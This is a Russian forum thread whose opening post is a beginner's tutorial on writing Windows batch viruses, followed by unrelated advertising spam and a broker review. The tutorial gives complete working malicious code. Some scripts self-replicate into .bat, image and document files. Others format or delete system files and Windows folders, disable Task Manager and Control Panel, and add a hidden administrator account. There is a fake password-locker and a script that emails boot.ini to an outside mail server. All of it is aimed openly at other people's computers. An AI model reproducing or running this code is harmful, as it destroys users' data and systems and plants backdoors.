LM | Forum

Объявление


У тебя есть imessage на iPhone/iPod/iPad ? И тебе скучно или просто хочешь проверить как работает ? Заходи сюда vk.com/imessage_ios



Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » LM | Forum » Статьи/Полезное » Как написать Вирус [Для начинающего]


Как написать Вирус [Для начинающего]

Сообщений 1 страница 10 из 25

1

Всем привет
Чтобы написать вирус Нам понадобиться
Блокнот и прямые Руки))

Ну, раз уж мы решили начать с самого простого, то свой первый вирус создадим в обычном текстовом редакторе, встроенном в Windows. Такой вирус будет называться BAT-вирусом.
По мере написания исходника, в фигурных скобках буду пояснять о чем речь.

@Echo off {запрещаем вывод на экран исполняемых команд}
copy %0 c:virus.bat >nul {копируем файл; запрещаем вывод на экран самой команды и результата её действия}
echo c:virus.bat>>c:autoexec.bat {добавляем текст в уже существующий файл}

Вот и все! Проще не бывает! Это пример одного из самых простых bat-вирусов. Хотя с полной уверенностью сказать, что это вирус, значит сказать ерунду. Посмотрите на то, что написано в фигурных скобках и вы поймете, что это просто пример того, как сделать основу вируса. Продолжаю:

@Echo off
copy %0 c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
copy %0 a:run.bat >nul {копируем этот файл на дискету, если таковая имеется в дисководе (копирование произойдет при перезагрузке компа)}

Таким образом к предыдущему исходнику я добавила одну строку и вирус приобрел новую способность: он теперь умеет заражать другие компы через дискету.

@Echo off
copy %0 c:virus.bat >nul
attrib +h c:virus.bat >nul {устанавливаем файлу virus.bat атрибут «скрытый» (файл virus.bat наверняка попадется юзеру на глаза и будет их мозолить , поэтому делаем его скрытым)}
echo c:virus.bat>>c:autoexec.bat
copy %0 a:run.bat >nul

Вот, наш исходник начинает приобретать очертания вируса!

@Echo off
if exist c:virus.bat goto ski {проверяем, существует ли файл, …}
copy %0 c:virus.bat >nul
attrib +h c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
:ski {…если он существует, то программа переходит на метку :ski}
copy %0 a:run.bat >nul

Добавила еще одну команду «if exist». Теперь вирус уже будет проверять, есть ли этот файл, и если он есть, то уже не будут выполняться лишние команды. Только скопирует себя на дискету и все.
Теперь модернизируем наш вирус до конца.

@echo off%[Meteor]% {выводим на экран текст «Meteor»}

if '%1=='In_ goto Meteo {если переменная %1 равна In, то переходим к метке «:Meteo»}

if exist c:Meteor.bat goto Mete {проверяем, существует ли файл Meteor.bat, если да, то переходим к метке «:Mete»}

if not exist %0 goto Met {если файл не существует, то переходим к метке «Met»}

find "Meteor"c:Meteor.bat {проверяем, есть ли файл meteor на диске, если нет, то копируем его туда}

attrib +h c:Meteor.bat {делаем файл скрытым}

:Mete {метка}

for %%t in (*.bat) do call c:Meteor In_ %%t {выполняем одну команду (call - позволяет вызвать один пакетный файл из другого) для нескольких параметров t} {т.е. вирус находит файл с расширением .bat, и заражает его с помощью команды type, дописывая себя к найденному .bat-файлу}

goto Met {перейти к метке}

:Meteo {метка}

find "Meteor"nul {указываем файлу значение 2 и запрещаем вывод команды и ее результата на экран}

if not errorlevel 1 goto Met {если не произошло ошибки (с кодом 1) выполнения предыдущей команды, то переходим на метку}

type c:Meteor.bat>>%2 {дописываем «себя» к найденному .bat-файлу}

:Met {метка}

Вот это уже можно назвать более или менее полноценным вирусом!
Для того чтобы вирус стал вирусом, его нужно сохранить с расширением BAT. Жмем «Сохранить как», пишем например virus.bat, и там куда вы его сохраните появится пакетный файл MS-DOS.
На основе этого исходника можно создавать другие вирусы. Экспериментируйте, модернизируйте, пробуйте написать свой вирус. Скажу к слову, что используя этот исходник, я сделал из него еще три модификации. И это не предел! Возможности не ограничены, все зависит от вашей фантазии.

Приведу еще один простой, но интересный пример

@Echo off
Echo format C: /q >> c:Autoexec.bat

Все! Ничего особенного, да? Этот вирус добавляет в autoexec.bat строку format C: /q и при перезагрузке компа происходит быстрое форматирование диска
И вот еще что:

Echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%mes.js
echo WSHShell.Popup ("ПИШИ СЮДА ЧТО УГОДНО"); >> %temp%mes.js
start %temp%mes.js
deltree /y %temp%mes.js

Добавь этот скрипт в свой вирус, вместо «ПИШИ СЮДА ЧТО УГОДНО» напиши свой текст (например, предсмертную речь для юзера ), и при запуске вируса вылезет окошечко с твоим сообщением!

На заметку файл мы сохраняем так Rango-hack ".bat" ← Обязательно

Еще пару bat кодов )) Вирусов.

Убирает рабочий стол
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
Выключается компьютер
@echo off
shutdown -s -t 1 -c "lol" >nul
Перезагрузка компьютера
@echo off
shutdown -r -t 1 -c "lol" >nul
Запрещает запускать программы
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
Удаление дров
@echo off
del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul
Удаляет звуки Windows

@echo off
del "%SystemRoot%\Media" /q >nul

Запрещает заходить в панель управления

@echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul

Запрещает комбинацию Ctrl-Alt-Delete

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul

Меняет местами значение кнопок мыши

%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

Удаляет курсор мыши

del "%SystemRoot%Cursors*.*" >nul

Меняет название корзины

reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F

Убирает панель управления

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

Серьезные вирусы
Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)
rd [Буква_Диск]: /s /q
Удаляет все файлы в program files
del c:Program Files/q

Убивает процесс explorer.exe

taskkill /f /im explorer.exe >nul

Создает миллион папок

FOR /L %%i IN (1,1,1000000) DO md %%i

Удаляет все драйвера, которые установлены на компьютере

del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul

Удаляет команду DEL

del %0

Будет открывать бесконечно Пэинт

:x
Start mspaint
goto x

Изменяет расширение всех ярлыков на .txt

assoc .lnk=.txt

Заражает Autoexec

copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul
reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul

Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)

@echo off
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y

сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.

rundll32 user,disableoemlayer

Меняет местами кнопки мыши,но обратная смена не возможна)

rundll32 user,SwapMouseButton

Удаляет ядро системы

del %systemroot%\system32\HAL.dll

Заражает *.jpg *.mp3 *.doc *.htm? *.xls. (Заражает
не только в текущем каталоге, но и надкаталоге)

@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (..\*.jpg ..\*.doc ..\*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:\MrWeb In_ %%ggoto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
Вирус заражает *.JPG в текущем каталоге
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (*.jpg) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben

Жестокие вирусы
У вашего ламера будет глючить компьютер.

@echo off
echo Set fso = CreateObject("Scripting.FileSystemObject") > %systemdrive%\windows\system32\rundll32.vbs
echo do >> %systemdrive%\windows\system32\rundll32.vbs
echo Set tx = fso.CreateTextFile("%systemdrive%\windows\system32\rundll32.dat", True) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs
echo FSO.DeleteFile "%systemdrive%\windows\system32\rundll32.dat" >> %systemdrive%\windows\system32\rundll32.vbs
echo loop >> %systemdrive%\windows\system32\rundll32.vbs

start %systemdrive%\windows\system32\rundll32.vbs

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system_host_run /t REG_SZ /d %systemdrive%\windows\system32\rundll32.vbs /f

Вирус который убивает Винду. Не проверяйте на своем компьютере=)
@echo This virus created by LIZA
@echo Virus: pcforumhack.ru™ Virus
@echo Autor: LIZA
@echo off
echo Chr(39)>%temp%\temp1.vbs
echo Chr(39)>%temp%\temp2.vbs
echo on error resume next > %temp%\temp.vbs
echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbs
echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp.vbs
reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0
copy %¶§% %SystemRoot%\user32dll.bat
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
echo fso.deletefile "C:\ntldr",1 >> %temp%\temp.vbs
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f
echo fso.deletefolder "D:\Windows",1 >> %temp%\temp.vbs
echo fso.deletefolder "I:\Windows",1 >> %temp%\temp.vbs
echo fso.deletefolder "C:\Windows",1 >> %temp%\temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
echo fso.deletefile sr+"\system32\hal.dll",1 >> %temp%\temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
echo fso.deletefolder sr+"\system32\dllcache",1 >> %temp%\temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
echo fso.deletefolder sr+"\system32\drives",1 >> %temp%\temp.vbs
echo s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","forum.whack.ru™">>%temp%\temp.vbs
echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","forum.whack.ru™">>%temp%\temp.vbs
echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","forum.whack.ru™">>%temp%\temp.vbs
echo on error resume next > %temp%\temp1.vbs
echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp1.vbs
echo do>>%temp%\temp1.vbs
echo fso.getfile ("A:\")>>%temp%\temp1.vbs
echo loop>>%temp%\temp1.vbs
echo on error resume next > %temp%\temp2.vbs
echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp2.vbs
echo do>>%temp%\temp2.vbs
echo execute"S.Run ""%comspec% /c echo "" & Chr(7), 0, True">>%temp%\temp2.vbs
echo loop>>%temp%\temp2.vbs
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
echo set application=createobject("shell.application")>>%temp%\temp.vbs
echo application.minimizeall>>%temp%\temp.vbs
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
start rundll32 user32, SwapMouseButton
reg add "HKCR\exefile\shell\open\command" /ve /t REG_SZ /d rundll32.exe /f
echo i=50 >> %temp%\temp.vbs
echo while i^>0 or i^<0 >> %temp%\temp.vbs
echo S.popup "forum.whack.ru™",0, "forum.whack.ru™",0+16 >> %temp%\temp.vbs
echo i=i-1 >> %temp%\temp.vbs
echo wend >> %temp%\temp.vbs
echo do >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys"{capslock}" >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys"{numlock}" >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys"{scrolllock}" >> %temp%\temp.vbs
echo loop>> %temp%\temp.vbs
echo Set oWMP = CreateObject("WMPlayer.OCX.7") >> %temp%\temp.vbs
echo Set colCDROMs = oWMP.cdromCollection >> %temp%\temp.vbs
echo if colCDROMs.Count ^>= 1 then >> %temp%\temp.vbs
echo For i = 0 to colCDROMs.Count - 1 >> %temp%\temp.vbs
echo colCDROMs.Item(i).eject >> %temp%\temp.vbs
echo next >> %temp%\temp.vbs
echo End If >> %temp%\temp.vbs
echo Call SendPost("smtp.mail.ru", "forum.whack.ru™@mail.ru", "support@mail.ru", "...", "Копм заражен!") >> %temp%\temp.vbs
echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\temp.vbs
echo Set iMsg = CreateObject("CDO.Message") >> %temp%\temp.vbs
echo Set iConf = CreateObject("CDO.Configuration") >> %temp%\temp.vbs
echo Set Flds = iConf.Fields >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "support" >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "support" >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru" >> %temp%\temp.vbs
echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25 >> %temp%\temp.vbs
echo Flds.Update >> %temp%\temp.vbs
echo iMsg.Configuration = iConf >> %temp%\temp.vbs
echo iMsg.To = strTo >> %temp%\temp.vbs
echo iMsg.From = strFrom >> %temp%\temp.vbs
echo iMsg.Subject = strSubject >> %temp%\temp.vbs
echo iMsg.TextBody = strBody >> %temp%\temp.vbs
echo iMsg.AddAttachment "c:\boot.ini" >> %temp%\temp.vbs
echo iMsg.Send >> %temp%\temp.vbs
echo End Function >> %temp%\temp.vbs
echo Set iMsg = Nothing >> %temp%\temp.vbs
echo Set iConf = Nothing >> %temp%\temp.vbs
echo Set Flds = Nothing >> %temp%\temp.vbs

echo s.run "shutdown -r -t 0 -c ""pcforumhack.ru™"" -f",1 >> %temp%\temp.vbs
start %temp%\temp.vbs
start %temp%\temp1.vbs
start %temp%\temp2.vbs

Вирус полностью блокирует систему при следующем запуске Windows.Даже в безопасном режиме, выключает диспетчер задач.Чтобы разблокировать компьютер можно введя код 200393!(Но он не разблокирует)
@echo off
CHCP 1251
cls
Set Yvaga=На вашем компьютере найден вирус.
Set pass=Пароль
Set pas=Введите пароль.
Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль
Set dim=Выключаю вирус...
title Внимание!!!
CHCP 866
IF EXIST C:\windows\boot.bat (
goto ok )
cls
IF NOT EXIST C:\windows\boot.bat (
ECHO Windows Registry Editor Version 5.00 >> C:\0.reg
ECHO. >> C:\0.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> C:\0.reg
ECHO. >> C:\0.reg
ECHO "Shell"="Explorer.exe, C:\\windows\\boot.bat " >> C:\0.reg
start/wait regedit -s C:\0.reg
del C:\0.reg
ECHO @echo off >>C:\windows\boot.bat
ECHO C:\WINDOWS\system32\taskkill.exe /f /im Explorer.exe >>C:\windows\boot.bat
ECHO reg add "HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system" /v DisableTaskMgr /t REG_DWORD /d 1 /f >>C:\windows\boot.bat
ECHO start sys.bat >>C:\windows\boot.bat
attrib +r +a +s +h C:\windows\boot.bat
copy virus.bat c:\windows\sys.bat
attrib +r +a +s +h C:\windows\sys.bat
GOTO end)
:ok
cls
Echo %Yvaga%
echo.
echo %virus%
echo %pas%
set /a choise = 0
set /p choise=%pass%:
if "%choise%" == "101" goto gold
if "%choise%" == "200393" goto status
exit
:status
echo %dim%
attrib -r -a -s -h C:\windows\boot.bat
del C:\windows\boot.bat
attrib -r -a -s -h C:\windows\sys.bat
del C:\windows\sys.bat
cls
:gold
start C:\
:end

Добавляет программу в автозагрузку ОС

copy ""%0"" "%SystemRoot%\system32\File.bat"
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

Этот вирус,блокирует все программы,но интернет работает.

@Echo off
Echo Virus Loading
Date 13.09.96
If exist c:ski.bat goto abc
Copy %0 c:ski.bat
Attrib +h c:ski.bat
Echo c:ski.bat >>autoexec.bat
:abc
md PRIDUROK
md LUZER
md DURAK
md LAMER
Label E: PRIDUROK
assoc .exe=.mp3
del c:Program Files/q
Echo VIRUS LOAD

Помните не запускайте у себя .!!=)

0

2

«ВЭД ЛАЙН» — логистическая компания, специализирующийся на балкерных отгрузках «от двери до двери». Вне зависимости оттого, желательны ли вам базовые фрахтовые услуги или совокупные услуги, необходимые для нашего участия в процессах таможенного оформления ввоза товаров. «ВЭД ЛАЙН»  предлагает последовательное комплексное решение для грузополучателей. Оказываемые нами услуги целиком и полностью соединены с нашими возможностями, чтобы вы были оповещены о настоящем статусе ваших товаров, на каком маршруте доставки бы они не прибывали. Наша команда профессионалов по логистике грузов помогает партнерам разобраться с секретами импортных требований и подготовки документации, обеспечивая свободную обработку грузов. «ВЭД ЛАЙН» также рекомендует клиентам воспользоваться готовым решением для отгрузки большого объема груза на зафрахтованном морском транспорте дедвейтом 3 000 т. по правилам Инкотермс 2020 FOB морские порты КНР — порт Находка Лесной Терминал — с погрузкой по жд или автомобильный транспорт. Бизнес-предложение подготовлено специально в интересах вашего бизнеса.

0

3

Esperio — обзор и реальные отзывы. Мошенники?
1 марта
<100 прочитали
Если вы задумываетесь о сотрудничестве с Esperio, то ознакомьтесь предварительно с этим обзором. Брокер заявляет о себе, как об одном из лучших на рынке. Однако наше мнение по этому вопросу противоположное. Мы проведем подробный анализ предложений этой компании и изучим отзывы трейдеров, чтобы определить, насколько ей можно доверять.

О компании
Официальное название: Esperio;
Адрес, контакты: First St. Vincent Bank Ltd Building, James Street, Kingstown, Сент-Винсент и Гренадины;
Лицензия: нет;
Как давно на рынке: с 2021;
Услуги: трейдинг;
Условия: леверидж до 1:1000, нет ограничений по минимальному депозиту;
Торговый терминал: MetaTrader 4/5;
Активы: контракты на разницу цен.
Самые свежие отзывы о Esperio со всего интернета
Несмотря на почти что вдохновляющее название, брокер не особо смог заслужить похвалу от трейдеров, особенно российских. Впрочем, судя по официальному сайту, именно на них он и ориентируется.

Итак, автор с ником MEMFIS1990 уверяет, что никому не удастся заработать с этим брокером. Согласно его комментарию, Esperio просто не выводит деньги. Мужчина уверяет, что все положительные отзывы на официальном сайте компании — фейковые. Он советует трейдерам работать только с проверенными брокерами, а не ноунеймами.

Следующий автор с ником Raspop нашел только один положительный момент у этого брокера. В отзыве он упоминает, что Esperio не скрывает отрицательной доходности по своим портфелям. В остальном мужчина тоже не советует связываться с этой компанией. Как минимум, потому что она мало кому известна и не регулируется авторитетными надзорными органами.

Не все трейдеры оказали столь осторожными, чтобы не торговать с Esperio. Автор следующего отзыва потерял 2 тысячи долларов на этой платформе. Он пополнял счет через систему WebMoney. К сожалению, обращение к юристам не решило вопрос, процедура чарджбэка в этом случае оказалась недоступной. Клиенту пришлось смириться с потерей, так как все его обращения Esperio все равно проигнорировал.

Еще одна девушка вообще описывает в отзыве порядок работы Esperio. Александра утверждает, что представители компании ищут потенциальных клиентов в социальных сетях. Изначально будущим жертвам предлагают работу, а именно, простое заполнение Excel таблиц. Потом их уговаривают приобрести курс обучения не менее чем за 50 тысяч рублей, и, наконец, самим начать торговлю на платформе Esperio. Естественно, все заканчивается сразу после пополнения. Аналитики, советующие открывать сделки, скорее рано, чем поздно, загоняют депозит трейдера в ноль.

Подтверждает слова Александры Виктория. Она называет Esperio самым ужасным местом работы. Девушка пишет в отзыве, что после месяца оплачиваемой стажировки ей, в конце концов, ничего не перечислили. Зато она регулярно терпела оскорбления от руководства. Виктория не скрывает, что главной ее обязанностью был холодный обзвон и развод людей на деньги.

Признаки обмана, мошенничества
Когда реальные отзывы настолько отличаются от тех, что брокер размещает на своем официальном сайте, вывод очевиден. Вряд ли перед нами честный и прозрачный посредник. К тому же, мы нашли и другие спорные моменты.

Срок существования проекта
Трейдеров пытаются убедить в том, что Esperio появился в отрасли еще в 2012 году. Это утверждение можно прочесть в коротком описании самой компании, и заметить в футере сайта. Однако ничего общего с реальным положением вещей такие заявления не имеют. В отзывах авторы пишут об отсутствии узнаваемости бренда не просто так. До недавнего времени о таком посреднике никто не знал.

Данные веб-архива показывают, что брокер занял сайт в июне 2021 года. В самом деле, сложно представить, чтобы за 10 лет работы действительно надежный брокер так и остался для большинства трейдеров неузнаваемым.
Регистрация
С юридическими данными у Esperio вообще произошла какая-то путаница. Брокер указывает в качестве управляющей компании некую OFG Cap LTD. При этом в реестр Сент-Винсент и Гренадин она должна быть внесена под номером 20603. Разумеется, мы не нашли ни одного упоминания о таком наборе цифр.

Но хотя бы OFG Cap, правда, не LTD, а LLC все-таки существует. Кстати, она была инкорпорирована в 2022 году, даже позже, чем появился официальный сайт. Уж совсем никак не в 2012. В футере указана недостоверная информация.
Добавить ко всему перечисленному стоит и то, что гренадинский офшор — не самое лучшее место в мире для регистрации бизнеса. Вернее, для мошенников, конечно, сойдет. А вот у клиентов, особенно трейдеров, могут возникнуть существенные проблемы при сотрудничестве с такими компаниями.

Отсутствие документов
Назваться брокером недостаточно. Esperio было бы неплохо еще получить официальное разрешение на свою деятельность. Но Сент-Винсент и Гренадины как раз предпочитают те посредники, которым не хочется думать о лицензиях. FSA (регулятор в этой юрисдикции) не выдает подобным онлайн дилинговым центрам лицензии. И вообще он не ведет никакого надзора за их деятельностью.

На главной странице регулятора так и написано, что внесение в реестр — это не гарантия хорошей репутации компании. Российский Центробанк, например, вообще заблокировал сайт Esperio и внес фирму в черный список.
Выводы
Esperio зарегистрирован в офшорной зоне Сент-Винсент и Гренадин, что означает отсутствие контроля со стороны государственных органов. Кроме того, у него нет лицензии на осуществление брокерской деятельности. Торговать на таких площадках не стоит. Это легко обернется потерей капитала.

Подпишитесь на канал,
чтобы не пропустить новые публикации

Подписаться
Комментарии
по популярности
Не удалось отправить сообщение
Комментировать
Войдите, чтобы комментировать

0

4

Hello. And Bye.

0

5

Вы занимаетесь торговлей или только думаете запустить свой бизнес? Мы намеренны стать вашим высоконадежным партнёром китайской продукции!

Наша компания asiancatalog.ru оказывает:

— Поиск товаров и изготовителей прямо в Китае.
— Выкуп товара у изготовителя.
— Доставка до вашего порога.
— Официальное таможенное оформление и сертификация товаров.
— Обслуживание "под ключ": от поиска до доставки.

Заказ абсолютно любого товара из Китая от автозапчастей до детских игрушек – мы найдем всё, что вам нужно, и доставим по лучшей цене.

Простой и понятный процесс взаимодействия:

1. Вы посылаете нам заявку на интересующий товар.
2. Мы ищем изготовителя, калькулируем цену с учетом перевозки и таможенных платежей.
3. После вашего подтверждения подписываем договор и приступаем к работе.

Ориентированы на бизнесменов! Наш многолетний опыт и профессионализм позволяют нам стоять в числе лидеров в сфере поставок из Китая. Поручите нам заботу о вашем бизнесе, и вы не пожалеете!

Ожидаем ваших запросов на asiancatalog.ru!

0

6

Вы занимаетесь продажей или только думаете инициализировать свой бизнес? Мы намеренны стать вашим прочным партнёром китайской продукции!

Наша компания asiancatalog.ru предоставляет:

— Поиск товаров и товаропроизводителей прямо в Китае.
— Выкуп товара у производителя.
— Доставка до вашего склада.
— Официальное таможенное оформление и сертификация товаров.
— Услуги "под ключ": от поиска до доставки.

Заказ абсолютно любого товара из Китая от мебели до детских игрушек – мы найдем всё, что вам нужно, и доставим по лучшей цене.

Простой и внятный процесс сотрудничества:

1. Вы посылаете нам заявку на интересующий товар.
2. Мы ищем товаропроизводителя, рассчитываем стоимость с учетом транспортировки и таможенных платежей.
3. После вашего утверждения заключаем договор и приступаем к работе.

Ориентированы на бизнесменов! Наш многолетний опыт и профессионализм позволяют нам оставаться в числе лидеров в сфере закупок из Китая. Доверьте нам заботу о вашем предпринимательстве, и вы не пожалеете!

